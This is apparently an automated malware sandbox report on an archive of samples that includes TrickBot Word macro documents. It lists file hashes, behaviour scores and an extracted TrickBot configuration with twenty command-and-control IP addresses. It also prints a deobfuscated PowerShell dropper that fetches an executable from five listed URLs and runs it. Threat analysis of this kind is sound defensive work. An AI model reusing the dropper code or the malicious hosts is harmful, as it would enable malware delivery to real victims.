Overview

overview

10

Static

static

10

2/VirusSha...8d.exe

windows10-2004-x64

3

2/VirusSha...fa.exe

windows10-2004-x64

3

2/VirusSha...c8.doc

windows10-2004-x64

10

2/VirusSha...03.doc

windows10-2004-x64

1

2/VirusSha...40.pdf

windows10-2004-x64

3

2/wedding.apk

android-9-x86

2/wedding.apk

android-10-x64

2/wedding.apk

android-11-x64

Sharing

Copy URL
Twitter E-mail

General

  • Target

    2.zip

  • Size

    7.6MB

  • Sample

    250414-a4lkeaxyew

  • MD5

    a29400d43fde42181d504827b759b313

  • SHA1

    9a408c982ae1d7b5ab3c370b703b368ed795efdf

  • SHA256

    b71968ea01e2c2ed82e28a557f3210f3fde4caf97a1368e520650a8e2f5f459c

  • SHA512

    38b10fada863f94d9ac68301d9c76785cb5eeec0e595a032818aefbae43452908fa4813c29fb054ab5adba040bfd56b58248f09a9fd120a7693b05791e8f6308

  • SSDEEP

    196608:5Xq0WFROFqZk50CYQRQ/MxVLq8/0FWo4ZFSo1JpCGi:5rekqCdSM7W8/YWo4ZlpCGi

Score
10/10
trickbotono33androiddiscoveryexecutionlinkmacromacro_on_actionpdf

Malware Config

Extracted

Family

trickbot

Version

1000501

Botnet

ono33

C2

5.182.210.226:443

5.182.210.120:443

185.65.202.183:443

212.80.217.243:443

85.143.218.249:443

194.5.250.178:443

198.15.119.121:443

107.175.87.142:443

185.14.31.72:443

188.165.62.2:443

194.5.250.179:443

198.15.119.71:443

185.14.29.4:443

185.99.2.202:443

192.3.193.162:443

89.191.234.89:443

195.54.32.12:443

31.131.21.30:443

5.34.177.194:443

190.214.13.2:449
Attributes
  • autorun
    Name:pwgrab
ecc_pubkey.base64
1
RUNTMzAAAADzIIbbIE3wcze1+xiwwK+Au/P78UrAO8YAHyPvHEwGVKOPphl8QVfrC7x/QaFYeXANw6E4HF7ietEp+7ZVQdWOx8c+HvO0Z2PTUPVbX9HAVrg4h9u1RNfhOHk+YysDLsg=

Extracted

Language
ps1
Deobfuscated
1
$jbjdmrkf = "Wvxojjxy"
2
$kqzvqjcdbdk = "306"
3
$gxduocdjcjt = "Bkfkbofippczt"
4
$mbkmoong = $env:userprofile + "\\" + $kqzvqjcdbdk + ".exe"
5
$uefczpcdfixo = "Rqdkzmydmwtwf"
6
$iybnpytfapm = new-object net.webclient
7
$dqsynahyyvxl = "https://sandiegohomevalues.com/engl/4de-kzsyhu-768611/", "https://www.wenkawang.com/data/bofze0s-7ji4-15/", "https://www.bruidsfotograaf-utrecht.com/wp-includes/QLvFLy/", "http://ma.jopedu.com/img/8z8dl-3xn-655019278/", "http://pay.jopedu.com/ThinkPHP/l9okcguh6-b9nnrh7-96245524/"
8
$avvhkoyer = "Zgzbdzymy"
9
foreach ($rcrndqfmfme in $dqsynahyyvxl) {
10
try {
11
$iybnpytfapm.downloadfile($rcrndqfmfme, $mbkmoong)
12
$ptiuqrijdklve = "Hwhsmlzs"
13
if ((get-item $mbkmoong).length -ge 30309) {
14
[diagnostics.process]::start($mbkmoong)
15
$lstxssia = "Ypyhvhhw"
16
break
17
$vnasbffmoq = "Cmgqpgssndib"
18
}
19
} catch {
20
}
URLs
exe.dropper

https://sandiegohomevalues.com/engl/4de-kzsyhu-768611/
exe.dropper

https://www.wenkawang.com/data/bofze0s-7ji4-15/
exe.dropper

https://www.bruidsfotograaf-utrecht.com/wp-includes/QLvFLy/
exe.dropper

http://ma.jopedu.com/img/8z8dl-3xn-655019278/
exe.dropper

http://pay.jopedu.com/ThinkPHP/l9okcguh6-b9nnrh7-96245524/

Targets

    • Target

      2/VirusShare_01b55404de50bd1a56343b2f316ff88d

    • Size

      121KB

    • MD5

      01b55404de50bd1a56343b2f316ff88d

    • SHA1

      8a6b9599d3e71c83eaef7f5a23df21b4f41370b1

    • SHA256

      69bd652ace6469311a49a12f66bbbc691bdfc69aba958dd02d928464cbb46609

    • SHA512

      f1ec4bf6768dea2edc53c72dd7c884641a464f4268d21480bb55fbdb1079b8c5c9fb50eab4b29d13acb4a8682ca6ae291341e01b748e228b185676e48df2e598

    • SSDEEP

      3072:JrhJGtDfYtWAh3A8lKl+/63VBwxkbwQXz8lFTnc:JrhJoDfY13KE/qVlNYvnc

    Score
    3/10
    discovery
    behavioral1

    • Target

      2/VirusShare_1ad9a67240d5775395c45b64dd6529fa

    • Size

      2.9MB

    • MD5

      1ad9a67240d5775395c45b64dd6529fa

    • SHA1

      c653d2c475f639ad68c210e0f9d829344c5663c7

    • SHA256

      3751298058a2a5d0912caa35bfdbafa48ae788647b536e69ad383c7c1990dd9d

    • SHA512

      721b1c577db1cfe5465eaceadf2a7cc9d3f68d341f98d7dcc4bde2ff606f359b6bc917e993f5f05e9897b7957ca2617fa03937c2aea6a8462b86f2e750397c23

    • SSDEEP

      49152:4obi85jFGg0IZHVA/pfa8u0Ikjhd6kss8CYxB52ibDIJZKpYg0Kg9e+KgFTRFO:Vzh6/I8u0IktgkOvxBUibs2Z0ggFdE

    Score
    3/10
    discovery
    behavioral2

    • Target

      2/VirusShare_2fe5b00079aec2d8369a798230313ec8

    • Size

      125KB

    • MD5

      2fe5b00079aec2d8369a798230313ec8

    • SHA1

      e233595a2ee62f6197fcc7d9088fce3505c38ec0

    • SHA256

      8eb6805a0852b220695175ce81a5b139f1438dc06ea3fc1347b047702880374c

    • SHA512

      d9b4173274b49d7f041aea1a6866d5cc79530360668299385a10f25597b608308a5cb6502363709a7e09e43d30a1df95e1ab72fcc71852c78b51da016c2bbed7

    • SSDEEP

      3072:beKgdzSrG8KyIwLx3phgC1s0rPOWfKNR/:beKUzSLnLx3X3O0r2WfKNJ

    Score
    10/10
    execution

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution
    behavioral3

    • Target

      2/VirusShare_3f0b1eed4b7b9ae05fab4d949843f103

    • Size

      35KB

    • MD5

      3f0b1eed4b7b9ae05fab4d949843f103

    • SHA1

      e5b9fa0a23f337adae93ed4e8fcd1e9d9db4acba

    • SHA256

      ce21d34bafe338effb8f619936f057084cb45743fce884a1465966d8523a00a8

    • SHA512

      292183a9d0b3e5759453a43bcf34b8b1d09d09523687bfab090dd740a5c70169938904949b1c5a025b40082898dc3ec240ad2ec788b66f256efe5a041f774740

    • SSDEEP

      384:3+WbqwPv/ETzbVwNY/+TU5lHizK+BS3DzxW8M2GzraAzVCIXh3aM:OWbqm/EvZwO2TUrEQDtI2G31lX5

    Score
    1/10
    behavioral4

    • Target

      2/VirusShare_480ef02bb062a57724e1b3e14532a140

    • Size

      32KB

    • MD5

      480ef02bb062a57724e1b3e14532a140

    • SHA1

      5ea2c3fdeb0b399e1805a94d8e6af4ce0de2c63e

    • SHA256

      b2e302356d613a814a41d356a61cee24fc133dd032e4b02d8e29436aedd8d742

    • SHA512

      82587a541bdc570b15402ef33beb14d9681160dc6e520f0c34b3c040658d17a9ced58feaa350f3a6c56eb7236ceb4bd09ba6ece56d13113780a6fe1a5044a99f

    • SSDEEP

      768:9EKOUP0/RXtY+E1dhX2e1kaVsVri7sF9/I70u5M/E5vXuMZmwgCLWarCC:ROc0JTE1dhX2e1kssVri7sng0u5MyXFh

    Score
    3/10
    discovery
    behavioral5

    • Target

      2/wedding.apk

    • Size

      5.3MB

    • MD5

      7a78191dad2e8baf6b372a4dc864430c

    • SHA1

      92f7a09036d7fc1c4ada288fdb114e5e5dcb09c1

    • SHA256

      7a42d7809fdef76fe0580d09ef6780a96c000d97712236e6550d7fff061e122a

    • SHA512

      28ed1d04180dbf9fa7ea9561ddc112377c7d81f6ee1078ceb2fb93782cb29ff875bafc03f5906379f87060132d048ff1802748a97eb7cde9647893e5550c2c8d

    • SSDEEP

      98304:dTUWQ8/rUKDzU87SWbFnVNyYdOYmwKOQarbcDSaBd2ZrYub+4XD:dTLHPSw7Nd8v0rr3aX4XD

    Score
    1/10
    behavioral6behavioral7behavioral8

MITRE ATT&CK Enterprise v16

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.